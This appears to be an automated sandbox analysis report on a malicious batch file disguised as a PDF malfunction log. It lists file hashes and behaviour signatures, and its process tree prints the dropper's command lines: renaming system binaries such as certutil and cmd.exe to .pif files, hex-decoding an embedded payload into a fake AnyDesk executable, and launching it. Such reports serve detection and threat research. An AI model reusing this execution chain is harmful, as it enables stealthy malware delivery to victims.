Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    20/01/2025, 06:25

General

  • Target

    MF-HF malfunction LOG Report,PDF.cmd

  • Size

    2.7MB

  • MD5

    52c4a6ab8615c5f10087756a5506a81d

  • SHA1

    4edc7261d4b1f624d94099071e5752fbc5864fae

  • SHA256

    b7aa6671b0d47e966e51c97c069edff139d312e7707ffbc22fb2392b3004021a

  • SHA512

    b542b3b361dac98ac1db9517aeac1bfec3dab4f3439729f466a225550e1c0b486bf662989bc15f51d25842fedca09087105bd81a48a13a9632f0167375ce39ef

  • SSDEEP

    24576:ybei0ej3l3KRE+5WyHCN51BPTjF0Sj2dkucbo0063u9wN6UFfbDXRCDy:ybeiJjERE+q51SdvmYUz

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SendNotifyMessage 4 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\MF-HF malfunction LOG Report,PDF.cmd"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2688
    • C:\Windows\system32\extrac32.exe
      extrac32.exe /C /Y "C:\\Windows\\System32\\wlrmdr.exe" "C:\\Users\\Public\\awpha.pif"
      2⤵
      PID:2324
    • C:\Windows\system32\extrac32.exe
      extrac32.exe /C /Y "C:\\Windows\\System32\\cmd.exe" "C:\\Users\\Public\\alpha.pif"
      2⤵
      PID:2284
    • C:\Windows\system32\extrac32.exe
      extrac32 /C /Y "C:\\Windows\\System32\\certutil.exe" "C:\\Users\\Public\\phf.pif"
      2⤵
      PID:3048
    • C:\Users\Public\alpha.pif
      C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\phf.pif -decodehex -F "C:\Users\Admin\AppData\Local\Temp\MF-HF malfunction LOG Report,PDF.cmd" "C:\\Users\\Public\\AnyDesk.avi" 9
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1580
      • C:\Users\Public\phf.pif
        C:\\Users\\Public\\phf.pif -decodehex -F "C:\Users\Admin\AppData\Local\Temp\MF-HF malfunction LOG Report,PDF.cmd" "C:\\Users\\Public\\AnyDesk.avi" 9
        3⤵
        • Executes dropped EXE
        PID:536
    • C:\Users\Public\alpha.pif
      C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\phf.pif -decodehex -F "C:\\Users\\Public\\AnyDesk.avi" "C:\\Users\\Public\\Libraries\\AnyDesk.pif" 12
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2736
      • C:\Users\Public\phf.pif
        C:\\Users\\Public\\phf.pif -decodehex -F "C:\\Users\\Public\\AnyDesk.avi" "C:\\Users\\Public\\Libraries\\AnyDesk.pif" 12
        3⤵
        • Executes dropped EXE
        PID:2876
    • C:\Users\Public\awpha.pif
      "C:\Users\Public\awpha.pif" -s 3600 -f 0 -t _ -m _ -a 11 -u C:\Users\Public\Libraries\AnyDesk.pif
      2⤵
      • Executes dropped EXE
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:2612
    • C:\Windows\system32\PING.EXE
      ping 127.0.0.1 -n 5
      2⤵
      • System Network Configuration Discovery: Internet Connection Discovery
      • Runs ping.exe
      PID:2628

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Public\AnyDesk.avi

    Filesize

    1.9MB

    MD5

    1681b40bf17bbaa119bc15de0178a7f0

    SHA1

    4aa764f20cfbcad18a2fd2d6233e80ad6ad8a341

    SHA256

    d61ec9e10804abaf84e4c59f3a9369f27fd25ba6e60ed293dfc82581b2553cda

    SHA512

    6b73ce5d844bfbc9caffc55c3412ed0b87e046c3833b000b14fed7e8b2fa3a6fe951b6d63a5080de65f5d69ad60b8a4d254542ad83233f2bb4ed1471fb6e49f6

  • C:\Users\Public\awpha.pif

    Filesize

    43KB

    MD5

    1b79536d9033da4ee3b8b21354dbd391

    SHA1

    09b4a38f0a6960768f26ef86a30bc0167e690f50

    SHA256

    385b4553cbef207d9c5e466002940c205d51b1e2095fa8b442de1f64d6512f95

    SHA512

    2475b0352929d87090d92d1d6b2cb3db97632d780bf898c1c44f9169d513752f1ef26df476f9eb8487e75cbdc5c5584e3a4470cfedcea709a39cd82a59c190ae

  • C:\Users\Public\phf.pif

    Filesize

    1.1MB

    MD5

    ec1fd3050dbc40ec7e87ab99c7ca0b03

    SHA1

    ae7fdfc29f4ef31e38ebf381e61b503038b5cb35

    SHA256

    1e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3

    SHA512

    4e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2

  • \Users\Public\alpha.pif

    Filesize

    337KB

    MD5

    5746bd7e255dd6a8afa06f7c42c1ba41

    SHA1

    0f3c4ff28f354aede202d54e9d1c5529a3bf87d8

    SHA256

    db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386

    SHA512

    3a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e